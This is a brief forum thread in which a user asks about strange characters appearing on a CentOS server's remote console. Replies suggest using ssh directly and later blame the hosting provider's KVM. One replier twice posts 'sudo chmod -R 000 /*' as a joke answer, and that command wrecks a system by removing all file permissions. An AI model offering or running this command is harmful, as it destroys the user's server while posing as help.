What's happening to my CentOS

I got this weird letter p all over the place on my server when I logged on to it, I used a mac for this, when I hit ctrl + c, those weird syncing thing appeared (2nd pic).

Does anyone know what's happening?

What program are you using to connect? Try running ssh directly in the terminal to make sure it's not a problem with your remote control software

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Try ssh, it's good enough if you only need the terminal

sudo chmod -R 000 /*

  • 2 weeks later...

It's something with Vultr's kvm (maybe their health check probe).   I have several vms with them and they all do it.
